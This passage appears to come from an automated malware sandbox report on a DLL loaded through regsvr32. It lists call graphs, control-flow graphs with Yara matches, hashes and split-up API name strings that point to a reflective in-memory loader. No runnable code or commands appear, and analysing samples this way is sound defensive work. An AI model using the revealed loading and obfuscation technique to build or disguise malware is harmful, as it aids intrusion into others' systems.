10249->10250 10251 7fff21bb3024 free 45 API calls 10250->10251 10252 7fff21bb9a04 10251->10252 10253 7fff21bb3024 free 45 API calls 10252->10253 10254 7fff21bb9a10 10253->10254 10255 7fff21bb3024 free 45 API calls 10254->10255 10256 7fff21bb9a1c 10255->10256 10257 7fff21bb3024 free 45 API calls 10256->10257 10258 7fff21bb9a28 10257->10258 10259 7fff21bb3024 free 45 API calls 10258->10259 10260 7fff21bb9a34 10259->10260 10261 7fff21bb3024 free 45 API calls 10260->10261 10262 7fff21bb9a40 10261->10262 10263 7fff21bb3024 free 45 API calls 10262->10263 10264 7fff21bb9a4c 10263->10264 10265 7fff21bb3024 free 45 API calls 10264->10265 10266 7fff21bb9a58 10265->10266 10267 7fff21bb3024 free 45 API calls 10266->10267 10268 7fff21bb9a64 10267->10268 10269 7fff21bb3024 free 45 API calls 10268->10269 10270 7fff21bb9a70 10269->10270 10271 7fff21bb3024 free 45 API calls 10270->10271 10272 7fff21bb9a7c 10271->10272 10273 7fff21bb3024 free 45 API calls 10272->10273 10273->10187 10275 7fff21bb471e unexpected 10274->10275 10283 7fff21bb480a 10274->10283 10295 7fff21bb91a0 10275->10295 10278 7fff21bb20e0 __initmbctable 8 API calls 10280 7fff21bb48aa 10278->10280 10280->10088 10282 7fff21bb8e9c __initmbctable 78 API calls 10282->10283 10283->10278 10285 7fff21bb20e9 10284->10285 10286 7fff21bb20f4 10285->10286 10287 7fff21bb23e8 RtlCaptureContext RtlLookupFunctionEntry 10285->10287 10286->10092 10288 7fff21bb246d 10287->10288 10289 7fff21bb242c RtlVirtualUnwind 10287->10289 10290 7fff21bb248f IsDebuggerPresent 10288->10290 10289->10290 10411 7fff21bb460c 10290->10411 10292 7fff21bb24ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10293 7fff21bb250c _invalid_parameter_noinfo 10292->10293 10294 7fff21bb2516 GetCurrentProcess TerminateProcess 10292->10294 10293->10294 10294->10092 10296 7fff21bb2534 _wcstoui64_l 45 API calls 10295->10296 10297 7fff21bb91c4 10296->10297 10305 7fff21bb8f34 10297->10305 10300 7fff21bb8e9c 10301 7fff21bb2534 _wcstoui64_l 45 API calls 10300->10301 10302 7fff21bb8ec0 10301->10302 10364 7fff21bb895c 10302->10364 10306 7fff21bb8fc1 10305->10306 10307 7fff21bb8f84 GetStringTypeW 10305->10307 10308 7fff21bb8f9e 10306->10308 10310 7fff21bb90f0 10306->10310 10307->10308 10309 7fff21bb8fa6 GetLastError 10307->10309 10311 7fff21bb90e9 10308->10311 10312 7fff21bb8fea MultiByteToWideChar 10308->10312 10309->10306 10329 7fff21bbe1e8 GetLocaleInfoA 10310->10329 10314 7fff21bb20e0 __initmbctable 8 API calls 10311->10314 10312->10311 10318 7fff21bb9018 10312->10318 10316 7fff21bb47a1 10314->10316 10316->10300 10317 7fff21bb914b GetStringTypeA 10317->10311 10320 7fff21bb916e 10317->10320 10321 7fff21bb6c34 realloc 45 API calls 10318->10321 10324 7fff21bb903d unexpected wcsftime 10318->10324 10325 7fff21bb3024 free 45 API calls 10320->10325 10321->10324 10322 7fff21bb90a4 MultiByteToWideChar 10326 7fff21bb90db 10322->10326 10327 7fff21bb90c6 GetStringTypeW 10322->10327 10324->10311 10324->10322 10325->10311 10326->10311 10328 7fff21bb3024 free 45 API calls 10326->10328 10327->10326 10328->10311 10330 7fff21bbe21a 10329->10330 10331 7fff21bbe21f 10329->10331 10333 7fff21bb20e0 __initmbctable 8 API calls 10330->10333 10360 7fff21bb2100 10331->10360 10334 7fff21bb911a 10333->10334 10334->10311 10334->10317 10335 7fff21bbe23c 10334->10335 10336 7fff21bbe28e GetCPInfo 10335->10336 10337 7fff21bbe366 10335->10337 10338 7fff21bbe2a0 10336->10338 10339 7fff21bbe33f MultiByteToWideChar 10336->10339 10340 7fff21bb20e0 __initmbctable 8 API calls 10337->10340 10338->10339 10341 7fff21bbe2aa GetCPInfo 10338->10341 10339->10337 10344 7fff21bbe2c5 _FF_MSGBANNER 10339->10344 10342 7fff21bb9140 10340->10342 10341->10339 10343 7fff21bbe2bf 10341->10343 10342->10311 10342->10317 10343->10339 10343->10344 10345 7fff21bb6c34 realloc 45 API calls 10344->10345 10347 7fff21bbe301 unexpected wcsftime 10344->10347 10345->10347 10346 7fff21bbe39d MultiByteToWideChar 10348 7fff21bbe3c7 10346->10348 10358 7fff21bbe3ff 10346->10358 10347->10337 10347->10346 10349 7fff21bbe407 10348->10349 10350 7fff21bbe3cc WideCharToMultiByte 10348->10350 10352 7fff21bbe439 10349->10352 10353 7fff21bbe40d WideCharToMultiByte 10349->10353 10350->10358 10351 7fff21bb3024 free 45 API calls 10351->10337 10354 7fff21bb3108 __wtomb_environ 45 API calls 10352->10354 10353->10352 10353->10358 10355 7fff21bbe446 10354->10355 10356 7fff21bbe44e WideCharToMultiByte 10355->10356 10355->10358 10357 7fff21bbe477 10356->10357 10356->10358 10359 7fff21bb3024 free 45 API calls 10357->10359 10358->10337 10358->10351 10359->10358 10361 7fff21bb287c 10360->10361 10362 7fff21bb25f8 _wcstoui64_l 67 API calls 10361->10362 10363 7fff21bb28a7 10362->10363 10363->10330 10365 7fff21bb89b4 LCMapStringW 10364->10365 10369 7fff21bb89d8 10364->10369 10366 7fff21bb89e4 GetLastError 10365->10366 10365->10369 10366->10369 10367 7fff21bb8ca6 10372 7fff21bbe1e8 _wcstoui64_l 67 API calls 10367->10372 10368 7fff21bb8a53 10370 7fff21bb8c9f 10368->10370 10371 7fff21bb8a71 MultiByteToWideChar 10368->10371 10369->10367 10369->10368 10373 7fff21bb20e0 __initmbctable 8 API calls 10370->10373 10371->10370 10382 7fff21bb8aa0 10371->10382 10374 7fff21bb8cd4 10372->10374 10375 7fff21bb47d4 10373->10375 10374->10370 10376 7fff21bb8e2f LCMapStringA 10374->10376 10377 7fff21bb8cf3 10374->10377 10375->10282 10393 7fff21bb8d3b 10376->10393 10379 7fff21bbe23c _wcstoui64_l 60 API calls 10377->10379 10378 7fff21bb8b1c MultiByteToWideChar 10380 7fff21bb8c91 10378->10380 10381 7fff21bb8b46 LCMapStringW 10378->10381 10383 7fff21bb8d0b 10379->10383 10380->10370 10389 7fff21bb3024 free 45 API calls 10380->10389 10381->10380 10384 7fff21bb8b70 10381->10384 10385 7fff21bb8ad1 wcsftime 10382->10385 10386 7fff21bb6c34 realloc 45 API calls 10382->10386 10383->10370 10387 7fff21bb8d13 LCMapStringA 10383->10387 10390 7fff21bb8b7b 10384->10390 10396 7fff21bb8bb6 10384->10396 10385->10370 10385->10378 10386->10385 10387->10393 10398 7fff21bb8d42 10387->10398 10388 7fff21bb8e5f 10388->10370 10394 7fff21bb3024 free 45 API calls 10388->10394 10389->10370 10390->10380 10392 7fff21bb8b92 LCMapStringW 10390->10392 10391 7fff21bb3024 free 45 API calls 10391->10388 10392->10380 10393->10388 10393->10391 10394->10370 10395 7fff21bb8c23 LCMapStringW 10399 7fff21bb8c44 WideCharToMultiByte 10395->10399 10400 7fff21bb8c83 10395->10400 10397 7fff21bb6c34 realloc 45 API calls 10396->10397 10405 7fff21bb8bd4 wcsftime 10396->10405 10397->10405 10402 7fff21bb8d63 unexpected wcsftime 10398->10402 10403 7fff21bb6c34 realloc 45 API calls 10398->10403 10399->10400 10400->10380 10404 7fff21bb3024 free 45 API calls 10400->10404 10401 7fff21bb8dc5 LCMapStringA 10406 7fff21bb8ded 10401->10406 10407 7fff21bb8df1 10401->10407 10402->10393 10402->10401 10403->10402 10404->10380 10405->10380 10405->10395 10406->10393 10410 7fff21bb3024 free 45 API calls 10406->10410 10409 7fff21bbe23c _wcstoui64_l 60 API calls 10407->10409 10409->10406 10410->10393 10411->10292 10413 7fff21bb6adf 10412->10413 10414 7fff21bb6af6 10412->10414 10415 7fff21bb7160 _FF_MSGBANNER 44 API calls 10413->10415 10416 7fff21bb6b0b 10414->10416 10418 7fff21bb309c __setargv 44 API calls 10414->10418 10417 7fff21bb6ae4 10415->10417 10416->10097 10416->10100 10420 7fff21bb6f0c _FF_MSGBANNER 44 API calls 10417->10420 10419 7fff21bb6b19 10418->10419 10421 7fff21bb6b21 10419->10421 10422 7fff21bb6b30 10419->10422 10423 7fff21bb6aec 10420->10423 10424 7fff21bb67e0 _errno 44 API calls 10421->10424 10425 7fff21bb6ba0 _lock 44 API calls 10422->10425 10426 7fff21bb334c _lock 3 API calls 10423->10426 10424->10416 10427 7fff21bb6b3a 10425->10427 10426->10414 10428 7fff21bb6b72 10427->10428 10429 7fff21bb6b43 10427->10429 10430 7fff21bb3024 free 44 API calls 10428->10430 10431 7fff21bb7ee4 _lock InitializeCriticalSectionAndSpinCount 10429->10431 10434 7fff21bb6b61 LeaveCriticalSection 10430->10434 10432 7fff21bb6b50 10431->10432 10432->10434 10435 7fff21bb3024 free 44 API calls 10432->10435 10434->10416 10436 7fff21bb6b5c 10435->10436 10437 7fff21bb67e0 _errno 44 API calls 10436->10437 10437->10434 10439 7fff21bb740a EncodePointer 10438->10439 10439->10439 10440 7fff21bb741f 10439->10440 10440->9840 10444 7fff21bb72d4 10441->10444 10457 7fff21bb3364 10444->10457 10459 7fff21bb6d01 10458->10459 10465 7fff21bb6d33 realloc 10458->10465 10460 7fff21bb6d0f 10459->10460 10459->10465 10461 7fff21bb67e0 _errno 44 API calls 10460->10461 10463 7fff21bb6d14 10461->10463 10462 7fff21bb6d4b RtlAllocateHeap 10464 7fff21bb6d2f 10462->10464 10462->10465 10466 7fff21bb66d8 _invalid_parameter_noinfo 7 API calls 10463->10466 10464->9844 10465->10462 10465->10464 10466->10464 10469 7fff21bb2e21 10468->10469 10497 7fff21bb2f42 10468->10497 10470 7fff21bb2e3c 10469->10470 10471 7fff21bb3024 free 45 API calls 10469->10471 10472 7fff21bb2e4a 10470->10472 10474 7fff21bb3024 free 45 API calls 10470->10474 10471->10470 10473 7fff21bb2e58 10472->10473 10475 7fff21bb3024 free 45 API calls 10472->10475 10476 7fff21bb2e66 10473->10476 10477 7fff21bb3024 free 45 API calls 10473->10477 10474->10472 10475->10473 10478 7fff21bb2e74 10476->10478 10479 7fff21bb3024 free 45 API calls 10476->10479 10477->10476 10480 7fff21bb2e82 10478->10480 10481 7fff21bb3024 free 45 API calls 10478->10481 10479->10478 10482 7fff21bb2e93 10480->10482 10484 7fff21bb3024 free 45 API calls 10480->10484 10481->10480 10483 7fff21bb2eab 10482->10483 10485 7fff21bb3024 free 45 API calls 10482->10485 10486 7fff21bb6ba0 _lock 45 API calls 10483->10486 10484->10482 10485->10483 10488 7fff21bb2eb5 10486->10488 10490 7fff21bb3024 free 45 API calls 10488->10490 10492 7fff21bb2ee3 10488->10492 10490->10492 10500 7fff21bb6a80 LeaveCriticalSection 10492->10500 10497->9871 10501 7fff21bb2050 10504 7fff21b71000 10501->10504 10505 7fff21b7101e ExitProcess 10504->10505

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 560000-560460 call 560aa8 * 2 VirtualAlloc 30 560462-560466 8->30 31 56048a-560494 8->31 32 560468-560488 30->32 34 560a91-560aa6 31->34 35 56049a-56049e 31->35 32->31 32->32 35->34 36 5604a4-5604a8 35->36 36->34 37 5604ae-5604b2 36->37 37->34 38 5604b8-5604bf 37->38 38->34 39 5604c5-5604d2 38->39 39->34 40 5604d8-5604e1 39->40 40->34 41 5604e7-5604f4 40->41 41->34 42 5604fa-560507 41->42 43 560531-560567 GetNativeSystemInfo 42->43 44 560509-560511 42->44 43->34 46 56056d-560589 VirtualAlloc 43->46 45 560513-560518 44->45 47 560521 45->47 48 56051a-56051f 45->48 49 5605a0-5605ac 46->49 50 56058b-56059e 46->50 52 560523-56052f 47->52 48->52 51 5605af-5605b2 49->51 50->49 53 5605b4-5605bf 51->53 54 5605c1-5605db 51->54 52->43 52->45 53->51 56 5605dd-5605e2 54->56 57 56061b-560622 54->57 58 5605e4-5605ea 56->58 59 5606db-5606e2 57->59 60 560628-56062f 57->60 61 5605ec-560609 58->61 62 56060b-560619 58->62 64 560864-56086b 59->64 65 5606e8-5606f9 59->65 60->59 63 560635-560642 60->63 61->61 61->62 62->57 62->58 63->59 68 560648-56064f 63->68 66 560917-560929 64->66 67 560871-56087f 64->67 69 560702-560705 65->69 70 560a07-560a1a 66->70 71 56092f-560937 66->71 72 56090e-560911 67->72 73 560654-560658 68->73 74 560707-56070a 69->74 75 5606fb-5606ff 69->75 89 560a40-560a4a 70->89 90 560a1c-560a27 70->90 77 56093b-56093f 71->77 72->66 76 560884-5608a9 72->76 78 5606c0-5606ca 73->78 79 56070c-56071d 74->79 80 560788-56078e 74->80 75->69 105 560907-56090c 76->105 106 5608ab-5608b1 76->106 85 560945-56095a 77->85 86 5609ec-5609fa 77->86 83 5606cc-5606d2 78->83 84 56065a-560669 78->84 82 560794-5607a2 79->82 87 56071f-560720 79->87 80->82 91 56085d-56085e 82->91 92 5607a8 82->92 83->73 93 5606d4-5606d5 83->93 97 56067a-56067e 84->97 98 56066b-560678 84->98 95 56095c-56095e 85->95 96 56097b-56097d 85->96 86->77 99 560a00-560a01 86->99 88 560722-560784 87->88 88->88 100 560786 88->100 103 560a4c-560a54 89->103 104 560a7b-560a8e 89->104 101 560a38-560a3e 90->101 91->64 102 5607ae-5607d4 92->102 93->59 107 560960-56096c 95->107 108 56096e-560979 95->108 110 5609a2-5609a4 96->110 111 56097f-560981 96->111 112 560680-56068a 97->112 113 56068c-560690 97->113 109 5606bd-5606be 98->109 99->70 100->82 101->89 123 560a29-560a35 101->123 139 5607d6-5607d9 102->139 140 560835-560839 102->140 103->104 124 560a56-560a79 RtlAddFunctionTable 103->124 104->34 105->72 121 5608b3-5608b9 106->121 122 5608bb-5608c8 106->122 125 5609be-5609bf 107->125 108->125 109->78 119 5609a6-5609aa 110->119 120 5609ac-5609bb 110->120 114 560983-560987 111->114 115 560989-56098b 111->115 116 5606b6-5606ba 112->116 117 5606a5-5606a9 113->117 118 560692-5606a3 113->118 114->125 115->110 126 56098d-56098f 115->126 116->109 117->109 127 5606ab-5606b3 117->127 118->116 119->125 120->125 129 5608ea-5608fe 121->129 130 5608d3-5608e5 122->130 131 5608ca-5608d1 122->131 123->101 124->104 128 5609c5-5609cb 125->128 134 560991-560997 126->134 135 560999-5609a0 126->135 127->116 136 5609cd-5609d3 128->136 137 5609d9-5609e9 VirtualProtect 128->137 129->105 147 560900-560905 129->147 130->129 131->130 131->131 134->125 135->128 136->137 137->86 144 5607e3-5607f0 139->144 145 5607db-5607e1 139->145 141 560844-560850 140->141 142 56083b 140->142 141->102 146 560856-560857 141->146 142->141 149 5607f2-5607f9 144->149 150 5607fb-56080d 144->150 148 560812-56082c 145->148 146->91 147->106 148->140 152 56082e-560833 148->152 149->149 149->150 150->148 152->139
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.400993388.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: ec91f80fdcff5eeff2f5e540fcd54e47381eb81e866dd697016cc476dff86391
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 6C72D630618B488FDB29DF18C8856BABBE1FB98305F10562DE8CBD7251DB34D946CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 287 180007958-1800079e2 call 1800142a0 290 1800079e5-1800079eb 287->290 291 1800079f1 290->291 292 180007f68-180007f6e 290->292 295 180007eb7-180007f4d call 180021434 291->295 296 1800079f7-1800079fd 291->296 293 180008084-180008101 call 180021434 292->293 294 180007f74-180007f7a 292->294 317 180008103-180008108 293->317 318 18000810d 293->318 301 180007fb4-180008075 call 18001e794 294->301 302 180007f7c-180007f82 294->302 310 180007f52-180007f58 295->310 297 180007d01-180007e4c call 180008738 296->297 298 180007a03-180007a09 296->298 316 18000807a-18000807f 297->316 324 180007e52-180007eaf call 18001d408 297->324 305 180007c76-180007cf7 call 180013e28 298->305 306 180007a0f-180007a15 298->306 301->316 303 180007f84-180007f8a 302->303 304 180007f9a-180007faf 302->304 311 18000811e-180008124 303->311 312 180007f90-180007f95 303->312 304->290 305->297 313 180007a1b-180007a21 306->313 314 180007b1d-180007c71 call 180018c60 call 180001b1c 306->314 319 1800081dd-1800081fd 310->319 320 180007f5e 310->320 311->319 328 18000812a 311->328 312->290 322 180007a27-180007a2d 313->322 323 18000812f-1800081d8 call 180013e28 313->323 327 180008112-18000811b 314->327 326 180007b0c-180007b18 317->326 318->327 320->292 322->311 330 180007a33-180007af3 call 18002b4c4 322->330 323->319 324->295 326->290 327->311 328->290 337 180007af8-180007b06 330->337 337->326
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                    • API String ID: 0-4168131144
                                                                    • Opcode ID: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                    • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                    • Opcode Fuzzy Hash: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                    • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 389 180010ff4-180011016 390 180011020 389->390 391 180011022-180011028 390->391 392 180011814 391->392 393 18001102e-180011034 391->393 394 180011819-18001181f 392->394 395 1800114e2-1800114ec 393->395 396 18001103a-180011040 393->396 394->391 397 180011825-180011832 394->397 400 1800114f5-18001151d 395->400 401 1800114ee-1800114f3 395->401 398 1800113e2-1800114d2 call 180008200 396->398 399 180011046-18001104c 396->399 398->397 408 1800114d8-1800114dd 398->408 399->394 403 180011052-18001120b call 180021040 call 1800291ac 399->403 404 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 400->404 401->404 415 180011212-1800113d7 call 1800291ac call 18001e2bc 403->415 416 18001120d 403->416 419 1800117f9-180011803 404->419 408->391 415->397 424 1800113dd 415->424 416->415 419->397 420 180011805-18001180f 419->420 420->391 424->390
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 425 180021618-180021653 426 180021655-18002165a 425->426 427 180021bf3-180021c25 426->427 428 180021660-180021665 426->428 429 180021c2a-180021c2f 427->429 430 180021a81-180021bda call 180016314 428->430 431 18002166b-180021670 428->431 432 180021838-180021845 429->432 433 180021c35 429->433 437 180021bdf-180021bee 430->437 434 1800219f3-180021a7c call 180001b1c 431->434 435 180021676-18002167b 431->435 433->426 434->426 438 1800219e4-1800219ee 435->438 439 180021681-180021686 435->439 437->426 438->426 441 1800219d5-1800219df call 18001dfb4 439->441 442 18002168c-180021691 439->442 441->426 444 180021697-18002169c 442->444 445 18002190c-1800219a5 call 18000abac 442->445 448 1800216a2-1800216a7 444->448 449 180021846-180021907 call 180021434 444->449 452 1800219aa-1800219b0 445->452 448->429 453 1800216ad-180021835 call 180008200 call 1800166c0 448->453 449->426 455 1800219b2-1800219c6 452->455 456 1800219cb-1800219d0 452->456 453->432 455->426 456->426
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 490 180028c20-180028c53 491 180028c58-180028c5e 490->491 492 180028c64-180028c6a 491->492 493 1800290ae-180029147 call 180013e28 491->493 494 1800290a4-1800290a9 492->494 495 180028c70-180028c76 492->495 502 18002914c-180029152 493->502 494->491 497 180029003-18002909f call 180008ea0 495->497 498 180028c7c-180028c82 495->498 497->491 500 180028c88-180028c8e 498->500 501 180028fab-180028ffe call 1800223c4 498->501 505 180028c94-180028c9a 500->505 506 180028df6-180028e1e 500->506 501->491 507 180029154 502->507 508 18002919c-1800291a8 502->508 511 180028d62-180028ddb call 180016bd8 505->511 512 180028ca0-180028ca6 505->512 506->491 510 180028e24-180028e3c 506->510 507->491 514 180028e42-180028ee6 call 18001d49c 510->514 515 180028ee9-180028f0b 510->515 524 180028de0-180028de6 511->524 516 180028cac-180028cb2 512->516 517 180029159-180029197 call 1800164c8 512->517 514->515 520 180028f94-180028f95 515->520 521 180028f11-180028f92 call 18001d49c 515->521 516->502 522 180028cb8-180028d5d call 180010c00 516->522 517->508 527 180028f98-180028f9b 520->527 521->527 522->491 524->508 529 180028dec-180028df1 524->529 527->491 531 180028fa1-180028fa6 527->531 529->491 531->491
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :G$Q27$_5$yy8x$Mh
                                                                    • API String ID: 0-3587547327
                                                                    • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                    • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 533 18000c608-18000c62d 534 18000c632-18000c637 533->534 535 18000cc8a-18000cc8f 534->535 536 18000c63d 534->536 537 18000cc95-18000cc9a 535->537 538 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 535->538 539 18000c643-18000c648 536->539 540 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 536->540 541 18000ce33-18000ced7 call 180008ad8 call 18001c32c 537->541 542 18000cca0-18000cca5 537->542 572 18000cfb4-18000d00a call 1800194a4 538->572 543 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 539->543 544 18000c64e-18000c653 539->544 575 18000cc28-18000cc85 call 1800194a4 540->575 576 18000cedc-18000cf26 call 1800194a4 541->576 547 18000cd35-18000cdce call 18000703c call 18001c32c 542->547 548 18000ccab-18000ccb0 542->548 543->534 550 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 544->550 551 18000c659-18000c65e 544->551 590 18000cdd3-18000ce2e call 1800194a4 547->590 556 18000ccb6-18000cd30 call 180021434 548->556 557 18000d00f-18000d014 548->557 550->534 559 18000c664-18000c669 551->559 560 18000c8bb-18000c963 call 180002610 call 18001c32c 551->560 556->534 557->534 573 18000d01a-18000d020 557->573 568 18000c7b2-18000c85a call 180019618 call 18001c32c 559->568 569 18000c66f-18000c674 559->569 600 18000c968-18000c9bc call 1800194a4 560->600 602 18000c85f-18000c8b6 call 1800194a4 568->602 569->557 579 18000c67a-18000c73d call 180002178 call 18001c32c 569->579 572->557 575->534 576->534 608 18000c742-18000c7ad call 1800194a4 579->608 590->534 600->534 602->534 608->534
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
